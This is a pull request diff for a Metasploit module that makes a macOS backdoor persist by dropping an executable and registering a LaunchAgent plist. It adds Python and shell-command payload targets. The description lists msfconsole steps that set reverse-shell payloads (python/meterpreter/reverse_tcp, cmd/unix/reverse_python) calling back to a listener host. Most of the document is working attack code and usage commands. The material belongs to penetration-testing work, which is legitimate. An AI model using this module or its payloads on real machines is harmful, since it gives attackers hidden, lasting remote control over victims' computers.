### PR TITLE
fix #13486, add support for python and cmd targets in osx/local/persistence

### DIFF
--- a/modules/exploits/osx/local/persistence.rb
+++ b/modules/exploits/osx/local/persistence.rb
@@ -13,23 +13,29 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::EXE
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'          => 'Mac OS X Persistent Payload Installer',
-      'Description'   => %q{
-        This module provides a persistent boot payload by creating a plist entry
-        in current user's ~/Library/LaunchAgents directory. Whenever the user logs in,
-        the LaunchAgent will be invoked and this dropped payload will run.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        => [ "Marcin 'Icewall' Noga <marcin[at]icewall.pl>", "joev" ],
-      'Platform'      => [ 'osx' ],
-      'Arch'          => [ ARCH_X86, ARCH_X64 ],
-      'Targets'       => [ [ 'Mac OS X', {} ] ],
-      'DefaultTarget' => 0,
-      'SessionTypes'  => [ 'shell', 'meterpreter' ],
-      'DisclosureDate' => 'Apr 01 2012'
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Mac OS X Persistent Payload Installer',
+        'Description' => %q{
+          This module provides a persistent boot payload by creating a plist entry
+          in current user's ~/Library/LaunchAgents directory. Whenever the user logs in,
+          the LaunchAgent will be invoked and this dropped payload will run.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ "Marcin 'Icewall' Noga <marcin[at]icewall.pl>", 'joev' ],
+        'Targets' => [
+          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+          [ 'Mac OS X x86 (Native Payload for 10.14 and earlier)', { 'Arch' => ARCH_X86, 'Platform' => [ 'osx' ] } ],
+          [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+        ],
+        'DefaultTarget' => 0,
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'DisclosureDate' => 'Apr 01 2012'
+      )
+    )
 
     register_options([
       OptString.new('BACKDOOR_PATH',
@@ -47,8 +53,17 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     check_for_duplicate_entry
+
+    if target['Arch'] == ARCH_PYTHON
+      payload_bin = "#!/usr/bin/env python\n" + payload.encoded
+    elsif target['Arch'] == ARCH_CMD
+      payload_bin = "#!/usr/bin/env bash\n" + payload.raw
+    else
+      payload_bin = generate_payload_exe
+    end
+
     # Store backdoor on target machine
-    write_backdoor(generate_payload_exe)
+    write_backdoor(payload_bin)
     # Add plist file to LaunchAgents dir
     add_launchctl_item
     # tell the user how to remove the persistence if necessary
@@ -95,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Local
       cmd_exec("launchctl load -w #{plist_path.shellescape}")
     end
 
-    print_good("LaunchAgent installed successfully.")
+    print_good('LaunchAgent installed successfully.')
   end
 
   # path to upload the backdoor. any <user> or <random> substrings will be replaced.
@@ -109,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local
   # raises an error if a Launch Agent already exists at desired same plist_path
   def check_for_duplicate_entry
     if file?(plist_path)
-      fail_with "FileError", "Duplicate LaunchAgent plist already exists at #{plist_path}"
+      fail_with 'FileError', "Duplicate LaunchAgent plist already exists at #{plist_path}"
     end
   end
 
@@ -147,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Local
   # drops the file to disk, then makes it executable
   # @param [String] exe the executable to drop
   def write_backdoor(exe)
-    print_status("Dropping backdoor executable...")
+    print_status('Dropping backdoor executable...')
     cmd_exec("mkdir -p #{File.dirname(backdoor_path).shellescape}")
 
     if write_file(backdoor_path, exe)


### PR DESCRIPTION
This adds the option for python and cmd payloads to the exploit/osx/local/persistence module

## Verification

List the steps needed to make sure this thing works

- [x] Get a session on OSX
- [x] Test the python target:
```
use exploit/osx/local/persistence 
set target 2
set payload python/meterpreter/reverse_tcp
set LPORT 4445
set LHOST 192.168.56.1 
set SESSION 1
set RUN_NOW true 
run
```
- [x] **Verify** you get a session
- [x] Remove the persistence
- [x] Test the cmd target:
```
set target 3
set payload cmd/unix/reverse_python
set LPORT 4446
set LHOST 192.168.56.1
set SESSION 1
set RUN_NOW true
run
```
- [x] **Verify** you get a session

